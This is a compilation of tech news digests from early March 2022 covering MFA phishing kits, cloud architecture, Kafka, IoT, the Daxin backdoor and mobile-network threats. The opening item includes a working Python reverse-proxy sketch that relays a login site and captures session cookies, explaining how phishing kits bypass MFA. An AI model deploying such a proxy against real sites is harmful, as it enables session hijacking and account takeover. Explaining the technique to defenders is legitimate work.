Daily Tech Digest - March 03, 2022

Multifactor Authentication Is Being Targeted by Hackers

Proofpoint found today’s phishing kits range from “simple open-source kits with human-readable code and no-frills functionality to sophisticated kits utilizing numerous layers of obfuscation and built-in modules that allow for stealing usernames, passwords, MFA tokens, social security numbers, and credit card numbers.” How? By sending phishing emails with links to a fake target website, like a login page, to naive users. That, of course, is old news; hackers have been using that technique for ages. What this “new kind of kit” brings to the table is a transparent man-in-the-middle (MitM) reverse proxy. Sitting between the victim and the genuine site, it intercepts all the traffic, including credentials and session cookies, even though the victim is connected to the real site. ... One such program, Modlishka, already automates these attacks. Polish security researcher Piotr DuszyƄski said of it: “With the right reverse proxy targeting your domain over an encrypted, browser-trusted, communication channel one can really have serious difficulties in noticing that something was seriously wrong.”
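
To make the mechanism concrete, here is a minimal sketch (illustrative only, nothing like a production kit) of why a transparent reverse proxy defeats MFA: every request and response, including the session cookie issued after a successful MFA login, passes through code the attacker controls. The hostname and port are placeholders.

    # Toy transparent reverse proxy: relays every request to the real site
    # while logging session cookies in transit. Real kits such as Modlishka
    # add TLS termination, domain rewriting, and obfuscation on top.
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import urllib.request

    REAL_SITE = "https://login.example.com"  # placeholder target

    class ProxyHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            upstream = urllib.request.urlopen(REAL_SITE + self.path)
            body = upstream.read()
            self.send_response(upstream.status)
            for name, value in upstream.getheaders():
                if name.lower() in ("transfer-encoding", "connection"):
                    continue  # hop-by-hop headers don't survive re-serving
                if name.lower() == "set-cookie":
                    print("captured session cookie:", value)  # the MFA bypass
                self.send_header(name, value)
            self.end_headers()
            self.wfile.write(body)

    HTTPServer(("", 8080), ProxyHandler).serve_forever()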


How to choose a cloud data management architecture

Multi-cloud models incorporate one or more services from more than one cloud provider (and optionally may include on-premises or hybrid architectures). In this scenario, the difference is that services from multiple cloud providers are used. A DBMS offering and the applications that rely on it may be deployed on-premises, on one or more clouds, or both. As such, all of the considerations of hybrid cloud may apply, with the added considerations of deploying software in multiple cloud environments. These offerings have historically been limited to independent software vendors (ISVs) rather than native cloud service providers (CSPs), as the ISVs have more of a vested interest in making sure that their software runs in as many environments as possible. However, cloud service providers are increasingly engaging in multi-cloud and intercloud scenarios. The multi-cloud scenario generally appeals to end users who are concerned about cloud vendor lock-in and want to be able to move their applications easily to a different cloud provider.


How blockchain investigations work

Knowing the exact entity behind a batch of addresses can be crucial, and blockchain intelligence companies have ways of finding that. They aggregate information from multiple sources, often using off-chain data to enrich their understanding of transactions. They look at dark web forums, social media posts, and court papers, among other sources. "You can be on Facebook, and you see [someone] soliciting funds in bitcoin and there's an address there," Redbord says. That address is copied and can be associated with a cybercriminal ring, a terrorist organization, or other illicit entities, depending on the case. Such nuggets of information are gathered by blockchain intelligence companies and stored for future reference. "[We] are building a giant blacklist of cryptocurrency addresses," Redbord adds. This process of categorizing addresses is done in the background. Investigators using blockchain intelligence software simply input the address corresponding to the payment. Then, they can see the flow of digital money.
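
The lookup-and-trace step is easy to picture with a toy model: a labeled blacklist plus a graph of transfers, traversed breadth-first from the flagged address. The addresses and labels below are made up, standing in for a vendor's curated data.

    # Toy address lookup and fund-flow trace; placeholder data stands in
    # for a blockchain intelligence vendor's curated blacklist and graph.
    from collections import deque

    blacklist = {"bc1qscamaddr": "ransomware ring"}   # address -> label
    transfers = {                                     # address -> payees
        "bc1qscamaddr": ["bc1qmixer1"],
        "bc1qmixer1": ["bc1qexchange"],
    }

    def trace(address):
        """Follow outgoing transfers breadth-first from a flagged address."""
        seen, queue, flow = set(), deque([address]), []
        while queue:
            addr = queue.popleft()
            if addr in seen:
                continue
            seen.add(addr)
            flow.append((addr, blacklist.get(addr, "unlabelled")))
            queue.extend(transfers.get(addr, []))
        return flow

    for addr, label in trace("bc1qscamaddr"):
        print(addr, label)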


Will AI Ever Become Ubiquitous?

We’re entering an era where our personal data will be more valuable than ever, and consumers are beginning to wake up to that fact. A 2019 report indicated that over 60 percent of respondents felt connected devices were “creepy,” which will likely slow adoption of such devices. While all of this may sound daunting, there are some interesting innovations addressing the pain points. And you’re likely enjoying the benefits of this thinking without even realizing it. To understand, we have to go into a room filled with networking gear. Most of us are familiar with server rooms thanks to TV shows and movies where we see some generic, but high-tech, “data center.” What most consumers don’t realize is that companies don’t just upgrade all their data center hardware at once. Just as you likely don’t buy a new router when you buy a new laptop, data center components are swapped out over time, here and there, and can wind up as a patchwork of vendors and services. Some time ago, network administrators unified their management while allowing underlying systems to micro-manage the individual components.


IoT Deployment – How to Secure and Deploy Internet of Things Devices

Many IoT devices are connected to the internet and can be accessed by hackers from anywhere in the world. This makes them ripe for attack. Hackers can exploit vulnerabilities in these devices to gain access to sensitive data or even take control of them. Another issue is that many IoT devices are not well-integrated into existing IT security frameworks. As a result, they may not be properly protected against cyber threats. For example, many IoT devices lack adequate firewalls and intrusion detection systems, making them susceptible to attack. Finally, there is also a risk that malicious actors could weaponize IoT devices for use in DDoS attacks or other cyberattacks. For example, hackers could exploit vulnerabilities in smart TVs or other internet-connected devices to launch a devastating DDoS attack against a company or organization. To mitigate these security problems, organizations should take steps to secure their IoT devices properly. They should ensure that all devices have strong passwords and are routinely updated with the latest security patches.


The Cloud Challenge: Choice Paralysis and the Bad Strategy of “On-Premising” the Cloud

Here is the troubling fact: most organizations know that the cloud is different from on-prem, and most of them also know the main differences. Yet this knowledge doesn’t translate into better solutions. That is because most organizations face a challenge: "With all these cloud services out there, which one to use in each scenario?" Too many choices can lead developers/architects to some kind of decision paralysis. Instead of going through the many choices, they just resort to the most familiar. In the case of organizations that are used to building on-prem, this often means choosing the old stack without even considering the alternatives. Having hundreds of cloud services to choose from is indeed a challenge (Azure has 400+ different services at the time of writing this, and each service might have tens of built-in capabilities). However, it is still a good challenge to have. That is because if you’re not dealing with this challenge, you’re effectively dealing with the challenge of how to make the cloud behave like on-prem.

 

Software development is changing again. These are the skills companies are looking for

Today, good developers work across the stack – in fact, their success relies on their ability to engage with a range of stakeholders to deliver business outcomes, says Spencer Clarkson, chief technology officer at Verastar. "I think what makes a good developer nowadays is that rounded understanding," he says. "They need to be agile in working style, and also understand the concept of doing Agile development – fail fast, develop quickly." That's something that others recognise, too. Tech analyst Forrester says Agile delivery is critical to successful digital transformations, yet the best enterprises go even further. ... "Software development is now much more about gluing things together rather than building something from scratch," he says. "There's lots of good apps and products out there. It's how you glue them together – that's your IP. People need to have that aptitude first and be multiskilled second." Gartner also says organisations and their employees should be prepared to move in multiple strategic directions at once due to the ongoing requirements for innovation and digitisation.


Comparing Programming models: SYCL and CUDA

SYCL and CUDA serve the same purpose: to enhance performance through processing parallelization in varied architectures. However, SYCL offers more extensibility and code flexibility than CUDA while simplifying the coding process. Instead of using complex syntax, SYCL enables developers to use ISO C++ for programming. Unlike CUDA, SYCL is a pure C++ domain-specific embedded language that doesn’t require C++ extensions, allowing for a simple CPU implementation that relies on a pure runtime rather than a particular compiler. SYCL is a competitive alternative to CUDA in terms of programmability. With SYCL, there’s no need for a complex toolchain to develop an application, and the tools ecosystem is readily available, ensuring a hassle-free development experience. SYCL doesn’t need separate source files for the host and device. Instead, the code for the host and the device lives in the same C++ source file. SYCL implementations are capable of splitting up this source file, parsing the code, and sending it to the appropriate compilation backend.


Ban predictive policing systems in EU AI Act, says civil society

As it currently stands, the AIA lists four practices that are considered “an unacceptable risk” and which are therefore prohibited, including systems that distort human behaviour; systems that exploit the vulnerabilities of specific social groups; systems that provide “scoring” of individuals; and the remote, real-time biometric identification of people in public places. However, critics have previously told Computer Weekly that while the proposal provides a “broad horizontal prohibition” on these AI practices ... In their letter, published 1 March, the civil society groups explicitly call for predictive policing systems to be included in this list of prohibited AI practices, which is contained in Article 5 of the AIA. “To ensure that the prohibition is meaningfully enforced, as well as in relation to other uses of AI systems which do not fall within the scope of this prohibition, affected individuals must also have clear and effective routes to challenge the use of these systems via criminal procedure, to enable those whose liberty or right to a fair trial is at stake to seek immediate and effective redress,” it said.


IT leadership: 3 new rules for hybrid work

The very nature of the annual review sets up a dynamic where the manager critiques and the employee is on the defensive. The employee often feels that the manager focuses solely on shortcomings and not on achievements. They may wonder, “Why didn’t my manager mention this issue when it actually happened?” or “Why won’t my manager recognize the things I’ve done right?” The manager may be new to the position and not entirely familiar with the employee, their position, or work history, making a constructive review more challenging. In addition, many managers simply are not trained to communicate, coach, and lead effectively. With higher numbers of employees working remotely, reviews have an added layer of difficulty, especially if they aren’t done in person. Body language can be harder to read. Without seeing the employee in action day-to-day, the manager might not be aware of how productive they are. Zoom fatigue can also cause many employees to remain silent rather than actively participate.



Quote for the day:

"Leadership is about carrying on when everyone else has given up." -- Gordon Tredgold

Daily Tech Digest - March 02, 2022

7 mistakes CISOs make when presenting to the board

“Board meetings are not a great place for surprises,” says James Nelson, vice president of information security at Illumio, and CISOs need to avoid being caught off guard by questions they can’t answer. “Preparation should include not just generating the content in your slides, but also thinking about what questions the board will potentially ask you and considering your answers ahead of time.” Nelson advises apprising any executive team attendees of both your prepared material and the questions you think will be asked, as well as how you plan to answer them. “They will know you can’t guess them all, but the process can help build trust,” he adds. ... A boardroom is not the place to unburden yourself, although it can be tempting when you feel the collective burden of everyone’s risks on your shoulders, says Watts. “Don’t be the prophecy of doom, and be very careful when using fear, uncertainty, and doubt (FUD) as a weapon of leverage—it can come back to bite you.” Instead, explain why you think a problem exists, and follow that with solution options, your recommendations, and their associated benefits, Watts continues. “Do this as a package.”


InfluxDB as an IoT Edge Historian: A Crawl/Walk/Run Approach

The question of how to get data into a database is one of the most fundamental aspects of data processing that developers face. Data collection can be challenging enough when you’re dealing with local devices. Adding data from edge devices presents a whole new set of challenges. Yet the exponential increase in IoT edge devices means that companies need proven and reliable ways to collect data from them. The following are three different approaches to collecting data from edge devices. Edge devices have different capabilities — processing power, memory capacity, connectivity, etc. — so finding the right solution for your use case may require a bit of trial and error. However, you can use these approaches as a jumping-off point for building your solution. For context, we’re using InfluxDB as the processing and storage solution, and the cloud version of InfluxDB is the target destination here. Each edge device in these examples also runs the open source version of InfluxDB. We’re using the Flux language to create tasks that perform data transformations and annotations.
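
As a rough sketch of the simplest pattern, an edge device can write readings straight to a cloud InfluxDB instance with the official Python client. The URL, token, org, and bucket below are placeholders; the crawl/walk/run approaches described here layer an edge-local InfluxDB and Flux tasks on top of this basic write path.

    # Minimal edge-to-cloud write using the influxdb-client package;
    # all connection details are placeholders for your own account.
    from influxdb_client import InfluxDBClient, Point
    from influxdb_client.client.write_api import SYNCHRONOUS

    client = InfluxDBClient(url="https://cloud2.influxdata.com",
                            token="YOUR_TOKEN", org="your-org")
    write_api = client.write_api(write_options=SYNCHRONOUS)

    point = (Point("sensors")           # measurement name
             .tag("device", "edge-01")  # which edge device reported
             .field("temperature", 21.7))
    write_api.write(bucket="iot-edge", record=point)
    client.close()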


Introducing Ballast: An Adaptive Load Test Framework

As Uber’s architecture has grown to encompass thousands of interdependent microservices, we need to test our mission-critical components at max load in order to preserve reliability. Accurate load testing allows us to validate if a set of services are working at peak usage and optimal efficiency while retaining reliability. Load testing those services within a short time frame comes with its unique set of challenges. Most of these load tests historically involved writing, running, and supervising tests manually. Moreover, the degree to which tests accurately represent production traffic patterns gradually decreases over time as traffic organically evolves, imposing a long-term maintenance burden. The scope of the load testing effort continuously increases as the number of services grows, incurring a hidden cost to adding new features. With this in mind, we developed Ballast, an adaptive load test framework that leverages traffic capture using Berkeley Packet Filter (BPF) and replays the traffic using a PID Controller mechanism to adjust the number of requests per second (RPS) to each service. 
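
The PID mechanism itself is textbook control theory. Below is a generic sketch (not Uber's code; the gains and targets are illustrative) of a controller nudging replay RPS until a measured signal, say CPU utilization, reaches a setpoint.

    # Generic PID controller adjusting requests-per-second toward a target.
    class PIDController:
        def __init__(self, kp, ki, kd, setpoint):
            self.kp, self.ki, self.kd = kp, ki, kd
            self.setpoint = setpoint       # e.g., target CPU utilization (%)
            self.integral = 0.0
            self.prev_error = 0.0

        def update(self, measured, dt):
            error = self.setpoint - measured
            self.integral += error * dt
            derivative = (error - self.prev_error) / dt
            self.prev_error = error
            return (self.kp * error + self.ki * self.integral
                    + self.kd * derivative)

    pid = PIDController(kp=2.0, ki=0.5, kd=0.1, setpoint=70.0)
    rps = 100.0
    for cpu_sample in (40.0, 55.0, 63.0, 69.0):   # mock utilization readings
        rps = max(0.0, rps + pid.update(cpu_sample, dt=1.0))
        print(f"replaying at {rps:.0f} RPS")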


Why Israel's Ministry of Defense is moving to the public cloud

The Tel Aviv-based engineering head of the MOD's cloud initiative, who asked that his name not be published for his own security purposes, explained the reasoning behind the changeover. "So, we are a very conservative organization, as to say, we have sensitive information, various sensitivity and classifications, and most of the data processing we do on an on-premise network," the MoD Infrastructure Cloud Group Leader told ZDNet. "But the data grows, and we (now) can just grow with it. So when we go to a public cloud, we want to address our ever-growing compute needs. And the second level is the (distribution) of services -- hundreds and even thousands of software services. So for us, it is in essence, a digital transformation. We can't achieve what we need by staying at home on our on-premise networks." Using the Anjuna Confidential Cloud software, the MoD is now able to achieve public cloud scale, agility, and maximum data security immediately, without having to recode or refactor applications, the MoD project head said.


CISO Checklist for Offboarding Security Staff

"As companies deal with increased rates of employee turnover, they must also consider the fact that highly skilled ex-employees are leaving with key institutional knowledge and confidential information," warns Todd Moore, global head of encryption products at Thales, a France-based multinational provider of electrical systems and services for the aerospace, defense, transportation, and security markets. "This potentially increases the risk of data breaches and other cyber incidents, which is further amplified when data organization and protection is overseen by human managers." Leave nothing to chance or oversight by working with a checklist instead. "CISOs should already be monitoring and updating the access rights of all employees and manage administrator access periodically and have a list of tasks and procedures in place when employees leave," says Ahmad Zoua, senior project manager at Guidepost Solutions, a global security, compliance, and investigations consulting firm.


10 key ESG and sustainability trends for business, IT

CIOs have an important role in the growing concern for sustainability and other socially conscious issues. "We live in a more technology-enabled and technology-dependent world than ever before, leaving CIOs with a great opportunity and an enormous responsibility," said Jahidul Khandaker, senior vice president and CIO of Western Digital, a U.S. computer hard disk drive manufacturer and data storage company, headquartered in San Jose, Calif. "CIOs must balance ... new [market] demands with how we respond to critical issues facing the world today, especially around the environment." Being proactive in these areas is critical. "Every enterprise is on the pathway to net-zero whether they have decided this for themselves at this point or not," Mingay said. "The only choice they have left is whether they want to lead, follow or get drawn in kicking and screaming." Regardless of how companies choose to engage, CIOs will have different roles, depending on those initiatives, Mingay said. Those roles can range from supporting leaders in other departments with the right information to taking on a more direct role in managing sustainability transformation, much like other digital transformation projects.


Avoiding the Chaotic 5G Rollout at Airports

The similarities between the C-band frequencies (3.7–3.98 GHz in the US) and those used by radio altimeters (4.2–4.4 GHz) can lead to interference with these radio altimeters receiving the appropriate radio waves, resulting in the following risks: Risk of an aircraft’s engine and braking systems not transitioning to landing mode, therefore preventing the aircraft from stopping on the runway; Risk of the altimeter not being able to receive the waves, or not being able to distinguish between the waves that it is expecting to receive and other nearby waves, thereby giving the wrong reading or not functioning at all. The risks listed above could result in situations such as the two fatal crashes of the Boeing 737 Max in Indonesia and Ethiopia, which killed 346 people. The US Federal Aviation Administration (FAA) and airlines have voiced concerns about these risks. As a result, the wireless carriers that purchased 5G frequencies via the Federal Communications Commission (FCC) 5G Spectrum Auction and are implementing the 5G rollout (Verizon and AT&T) stated that they would delay the expansion of new 5G cellular service near some airports in order to avert damaging disruptions in airport operations.


Behavioral Analytics is getting trickier

Although most enterprise CISOs are fine with behavioral analytics on paper (on a whiteboard? As a message within Microsoft Teams/Google Meet/Zoom?), they're resistant to rapid widespread deployment because it requires creating a profile for every user — including partners, distributors, suppliers, large customers and anyone else who needs system access. Those profiles can take more than a month to create to get an accurate, consistent picture of each person. I hate to make this even worse, but there are now arguments that security admins don't need one profile for every user, but possibly dozens or more. Why? ... You now have a behavioral profile of that user. That profile, however, is likely based on the user’s regular behavior during normal workdays. What about when that user is exhausted, say possibly after arriving in the office from a red-eye flight? Or ecstatically happy or horribly depressed? Do they behave differently in an unfamiliar hotel room compared to the comfort of their home office? Do they act differently after their boss has screamed at them for 10 minutes?
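
At its simplest, a behavioral profile is a per-user statistical baseline; the sketch below flags an anomalous login hour by z-score. This is a deliberately tiny illustration; real products model many more signals over weeks of data and, per the argument above, might need one baseline per context.

    # Toy per-user behavioral baseline: flag login hours that deviate
    # strongly from this user's historical pattern.
    from statistics import mean, stdev

    login_hours = [9, 9, 10, 8, 9, 10, 9, 8]   # the user's usual logins
    mu, sigma = mean(login_hours), stdev(login_hours)

    def is_anomalous(hour, threshold=3.0):
        return abs(hour - mu) / sigma > threshold

    print(is_anomalous(9))   # False: fits the workday baseline
    print(is_anomalous(3))   # True: a 3 a.m. login stands out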


Software development coaching dos and don’ts

Going one step beyond empathy requires software development managers to recognize the symptoms of people burning out. Signs of burnout include decreased productivity, increased cynicism toward colleagues, and a sense of detachment from the company. Dawn Parzych, manager of developer marketing at LaunchDarkly, believes that development teams can reduce stress by utilizing devops tools and practices. She shared a recent study showing that 91% of software development professionals who lack processes, such as using feature flags, report feeling stressed during deployments. She suggests, “As a manager, look to how you can remove stress and help your team members avoid burnout by improving build and deploy processes through the use of chaos days, observability, or feature flags.” ... Development managers should remind software developers that they don’t need to reinvent the wheel and code solutions from scratch all the time. There’s a wealth of software as a service, open source, cloud services, and low-code solutions available for developers to leverage.


Agile transformation: 5 ways to measure progress

In Agile workplaces, silos are broken down in favor of collaboration, communication, and transparency. To determine how well this is happening in your organization, assess the structures being put in place across projects. The presence of product owners in each of your scrum teams is a good starting point. A regular conversation with the product owners and scrum leaders can help you assess if the hierarchies are breaking down in favor of a more synergistic approach. Consider joining a few standup calls as an observer to get a first-hand understanding of how the development of a specific feature or assignment is moving between product owners, development teams, and quality assurance owners. A new business strategy can also be evaluated in terms of employee buy-in. If team members believe in the value and importance of Agile transformation, they will work harder to ensure its success. But if a critical mass of employees is skeptical about the change, they will make it harder to see a positive result.



Quote for the day:

"Power should be reserved for weightlifting and boats, and leadership really involves responsibility." -- Herb Kelleher

Daily Tech Digest - March 01, 2022

Using APIs with Low-Code Tools: 9 Best Practices

One of the best things about low- and no-code tools is their potential to get non-technical users involved in creating applications. But unless your non-technical colleagues understand what they can get out of using these tools — and unless they can use the tools without coding skills — it doesn’t matter which ones your organization adopts. “It’s all about users at the end of the day,” said Leonid Belkind, co-founder and chief technology officer at Torq, which provides a no-code security automation platform. “How many tools have you seen in your lifetime become shelfware? The organization bought it and nobody uses it. That’s the biggest risk. How do you avoid it? Find out the motivation and goals people have and match the tool to it,” he added. If you put user needs first, “the chances of it becoming shelfware are significantly lower.” It’s important to not only find out users’ needs but also ask them to explain how they now complete the tasks you’re trying to automate, Belkind said. Why is it important to identify who is going to work with the tool? he asked.


When NOT To Use Apache Kafka

If your application requires sub-millisecond latency, Kafka is not the right technology. For instance, high-frequency trading is usually implemented with purpose-built proprietary commercial solutions. Always keep in mind: the lowest latency would be to not use a messaging system at all and just use shared memory. In a race to the lowest latency, Kafka will lose every time. However, for the audit log and transaction log or persistence engine parts of the exchange, it is no data loss that becomes more important than latency and Kafka wins. Most real-time use cases "only" require data processing in the millisecond to the second range. In that case, Kafka is a perfect solution. ... Kafka is not a deterministic system. Safety-critical applications cannot use it for a car engine control system, a medical system such as a heart pacemaker, or an industrial process controller. ... Kafka requires good stable network connectivity between the Kafka clients and the Kafka brokers. Hence, if the network is unstable and clients need to reconnect to the brokers all the time, then operations are challenging, and SLAs are hard to reach.
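
The millisecond-to-second claim is easy to sanity-check yourself. A rough probe (assuming a local broker at localhost:9092 and a pre-created "latency-test" topic; this is a sketch, not a rigorous benchmark) might look like:

    # Rough end-to-end Kafka latency probe using confluent-kafka.
    import time
    from confluent_kafka import Producer, Consumer

    producer = Producer({"bootstrap.servers": "localhost:9092"})
    consumer = Consumer({
        "bootstrap.servers": "localhost:9092",
        "group.id": "latency-probe",
        "auto.offset.reset": "latest",
    })
    consumer.subscribe(["latency-test"])
    for _ in range(5):
        consumer.poll(1.0)   # give the consumer time to get its assignment

    producer.produce("latency-test", value=str(time.time_ns()))
    producer.flush()

    while True:
        msg = consumer.poll(1.0)
        if msg is not None and msg.error() is None:
            latency_ms = (time.time_ns() - int(msg.value())) / 1e6
            print(f"end-to-end latency: {latency_ms:.2f} ms")
            break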


5 Deadly Sins of Software Development

Crafting software, code that must be both executable by a computer and understandable by a human, is not an easy task. Before jumping on the development tools, you must devote a fixed timeframe to understanding your client’s business. Dig deep enough to understand HOW exactly the software is going to impact the workflow of the organization and the end-users. By doing so, you’ll get more clarity on what to work on and, more importantly, what not to work on. Every software developer who has attained significant success will tell you to understand the resulting benefit of the software. This will allow you to focus only on stuff that holds value, while preemptively eliminating the most obvious changes that the client’s review team would recommend. So the next time you sit in front of your computer for a new software project, go through the project’s brief to comprehend the WHY of the software before you begin coding. Making the software eloquent and interactive for the user is what every developer strives for. But while doing so, you must take care that you don’t add too many features, which could eventually overwhelm the user. This is because a confused mind denies everything.


Here’s how algorithms are made

When an algorithm is implemented and verified against the ground truth, it becomes formulated into a mathematical object that can later be used in other algorithms. An algorithm must stand the test of time, prove its value in applications, and demonstrate its usefulness in other scientific and applied work. Once proven, these algorithms become abstracted, taken as proven claims that need no further investigation. They become the basis and components of other algorithms, and contribute to further work in science. But an important point to underline here is that when the problem, ground truth, and implementation are formulated into an abstract entity, all the small details and facts that went into creating it become invisible and tend to be ignored. “If STS has long shown that scientific objects need to be manufactured in laboratories, the heavy apparatus of these locations as well as the practical work needed to make them operative tend to vanish as soon as written claims about scientific objects become certified facts,” Jaton writes in The Constitution of Algorithms.


How to empower IT Sec and Ops teams to anticipate and resolve IT problems

Runecast is a patented enterprise IT platform created for administrators, by administrators, and is tailored to the needs of those teams and enterprise leaders. Most importantly, though, it is a proactive platform aimed at helping IT admins anticipate potential problems before they become a headache and fix potential issues before they lead to service disruptions or exploitable vulnerabilities. The objective is reflected in the name of the company and the platform: casting (tossing) rune stones is how some cultures attempted to predict the future that would happen if no changes were made in the present. Runecast Analyzer does precisely this, and then provides actionable solutions to avoid damaging situations. Its power lies in Runecast AI Knowledge Automation (RAIKA), a technology that uses natural language processing (NLP) to crawl and analyze the previously mentioned mountain of available sources of unstructured knowledge to turn it all into machine-readable rules. RAIKA plugs into many different sources: knowledge base articles, online documentation, forums, blog posts, and even curated Twitter accounts of influencers.


How to Become a Data Scientist

Becoming a data scientist does not necessarily require a master’s degree. There is a significant shortage of data scientists, and some employers are comfortable hiring people who lack a degree, but have the experience needed. The majority of employed data scientists have a master’s degree, but over 25% do not. If you have the experience, a degree is not an absolute necessity to become employed as a data scientist. (If you are genuinely good at statistics, this may be a job for you. If you are not, by nature, good at statistics, this is probably not a job for you.) Data scientists process large amounts of data, often with the goal of increasing a business’ profits. Ideally, a data scientist has a strong understanding of statistics and statistical reasoning, computer languages, and business. They process and analyze large amounts of data to provide useful, meaningful information to their employers. These interpretations are used for decision-making. To provide this information, data scientists often work with messy, unstructured data, coming from emails, social media, and smart devices. 


Edge computing and 5G: What's next for enterprise IT?

When people talk about 5G, they’re usually referring to the major telco networks (and 5G-enabled devices that connect to those networks), which have begun rolling out and will expand considerably over time. Those networks have enterprise impacts, of course. But the “next big thing” for many businesses may be private 5G networks. It’s not a perfect comparison, but a private 5G network is kind of like a private cloud – an answer to the question (among others): “What happens if I want to leverage the technology while retaining as much control as possible?” “In addition to typical 5G, increasingly enterprises are evaluating private 5G models to transform specific parts of their business,” says Joshi, the Everest Group analyst. “This combined with edge devices can meaningfully change the way enterprises work.” Joshi points to use cases such as smart stadiums, connected fleets, autonomous vehicles, smart ports, and remote health as examples where interest is already abundant and the combination of private/public 5G networks and edge architecture could flourish.


A Quick Look at Advanced IoT Sensors for the Enterprise Going Digital

Machine vision is frequently used in EIoT solutions, especially to perform quality control of products. However, these vision systems are complex and rather expensive, which makes them much more difficult for smaller companies to implement. Today, they can be replaced with modern IoT sensors, as Denso showed. Denso has developed the smallest stereo vision sensor for use in cars to help prevent collisions. These vision sensors are implemented in smart cameras and can also be used for object recognition, manufacturing process control, and product quality assurance. Small, practical equipment can be installed in a factory to monitor a large number of production points. A sensor called Visionary-T DT, developed by the company Sick, can detect objects at a distance of up to 160 ft. It is a 3D video sensor that uses Time-of-Flight (TOF) technology to detect the presence or absence of 3D objects. Solutions built on this technology are strong candidates for ensuring enterprise security and for protecting objects or areas.


Anonymous Extends Its Russian Cyberwar to State-Run Media

Quantifying an uptick in cyber activity in Ukraine, Israeli firm Check Point said related attacks on Ukrainian government sites and its military increased by 196% in the first three days of the conflict. And as the situation on the ground has worsened, social media giants have considered or implemented stricter moderation policies over Russian disinformation efforts. Meta, the parent company of Facebook, says in a blog post that it has taken down a network run by users in Russia and Ukraine that was targeting the latter. Meta Head of Security Policy Nathaniel Gleicher and Director of Threat Disruption David Agranovich say the network violated its policy against "coordinated inauthentic behavior." Meta's security team says users created fake personae and claimed to be based in Kyiv - posing as news editors, a former aviation engineer and an author of a scientific publication on the science of mapping water. They claim there are similarities to a takedown in April 2020 that was connected to individuals in Russia, the disputed Donbas region in Ukraine and two now-sanctioned media organizations in Crimea.


Injecting fairness into machine-learning models

The machine-learning technique the researchers studied is known as deep metric learning, which is a broad form of representation learning. In deep metric learning, a neural network learns the similarity between objects by mapping similar photos close together and dissimilar photos far apart. During training, this neural network maps images in an “embedding space” where a similarity metric between photos corresponds to the distance between them. For example, if a deep metric learning model is being used to classify bird species, it will map photos of golden finches together in one part of the embedding space and cardinals together in another part of the embedding space. Once trained, the model can effectively measure the similarity of new images it hasn’t seen before. It would learn to cluster images of an unseen bird species close together, but farther from cardinals or golden finches within the embedding space. The similarity metrics the model learns are very robust, which is why deep metric learning is so often employed for facial recognition, Dullerud says.
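
A hedged sketch of the training step in PyTorch: a small network maps images into an embedding space, and a triplet margin loss pulls same-class pairs together while pushing different-class pairs apart. The network shape and the random "images" are placeholders, not the researchers' actual model.

    # Minimal deep-metric-learning step (illustrative placeholder model).
    import torch
    import torch.nn as nn

    embed = nn.Sequential(            # toy embedding network
        nn.Flatten(),
        nn.Linear(3 * 32 * 32, 256),
        nn.ReLU(),
        nn.Linear(256, 64),           # 64-dimensional embedding space
    )
    loss_fn = nn.TripletMarginLoss(margin=1.0)
    opt = torch.optim.Adam(embed.parameters(), lr=1e-3)

    # anchor and positive share a class (two golden finches, say);
    # the negative is a different class (a cardinal)
    anchor, positive, negative = (torch.randn(8, 3, 32, 32) for _ in range(3))

    loss = loss_fn(embed(anchor), embed(positive), embed(negative))
    opt.zero_grad()
    loss.backward()
    opt.step()

    # after training, similarity of new images is just embedding distance
    dist = torch.norm(embed(anchor) - embed(negative), dim=1)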



Quote for the day:

"In a time of universal deceit - telling the truth is a revolutionary act." -- George Orwell

Daily Tech Digest - February 28, 2022

Follow your S curve

By the time Rogers’s seminal Diffusion of Innovations was published in 1962, the rural sociologist was convinced that the S curve of innovation diffusion depicted “a kind of universal process of social change.” Indeed, S curves have been used in many arenas since then, and Rogers’s book is among the most cited in the social sciences, according to Google Scholar. Johnson’s S Curve of Learning follows this well-established path. There’s the slow advancement toward a “launch point,” during which you canvass the (hopefully) myriad opportunities for career growth available to you and pick a promising one. Then there’s the fast growth once you hit the “sweet spot,” as you build momentum, forging and inhabiting the new you. And, finally, there is “mastery,” the stage in which you might cruise for a while, reaping the rewards of your efforts, before you start looking for something new, starting the cycle all over again. Johnson lays out six different roles that you must play as you travel along her learning curve. In the launch phase, where I spent what felt like an eternity, you first act as an Explorer, who searches for and picks a destination.


Automation: 5 issues for IT teams to watch in 2022

IT automation rarely involves IT alone. Virtually any initiative beyond the experimentation or proof-of-concept phase will involve at least two – and likely several – areas of the business. The more ambitious the goals, the truer this becomes. Good luck to the IT leaders that tackle “improve customer satisfaction ratings by X” or “reduce call wait times by Y” without involving marketing, customer service/customer experience, and other teams, for example. In fact, automation initiatives are best served by aligning various stakeholders from the very start – before specific goals (and metrics for evaluating progress toward those goals) are set. “It’s really important to identify the key benefits you wish to achieve and get all stakeholders on the same page,” says Mike Mason, global head of technology at Thoughtworks. This entails more than just rubber-stamping your way to a consensus that automation will be beneficial to the business. Stakeholders need to align on why they want to automate certain processes or workflows, what the impacts (including potential downsides) will be, and what success actually looks like. Presuming alignment on any of these issues can put the whole project at risk.


Daxin: Stealthy Backdoor Designed for Attacks Against Hardened Networks

Daxin is a backdoor that allows the attacker to perform various operations on the infected computer such as reading and writing arbitrary files. The attacker can also start arbitrary processes and interact with them. While the set of operations recognized by Daxin is quite narrow, its real value to attackers lies in its stealth and communications capabilities. Daxin is capable of communicating by hijacking legitimate TCP/IP connections. In order to do so, it monitors all incoming TCP traffic for certain patterns. Whenever any of these patterns are detected, Daxin disconnects the legitimate recipient and takes over the connection. It then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange. A successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin’s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules.


Leveraging mobile networks to threaten national security

Once threat actors have access to mobile telecoms environments, the threat landscape is such that several orders of magnitude of leverage are possible in the execution of cyberattacks. An ability to variously infiltrate, manipulate and emulate the operations of communications service providers and trusted brands – abusing the trust of countless people using their services every day – derives from threat actors’ capability to weaponize the ‘trust’ built into the very design of the protocols, systems, and processes exchanging traffic between service providers globally. The primary point of leverage derives from the sustained capacity of threat actors over time to acquire data of targeting value, including personally identifiable information for public and private citizens alike. While such information can be gained through cyberattacks directed to that end on the data-rich network environments of mobile operators themselves, the incidence of data breaches of major data holders across industries today is such that it is increasingly possible to simply purchase massive amounts of such data from other threat actors.


A Security Technique To Fool Would-Be Cyber Attackers 

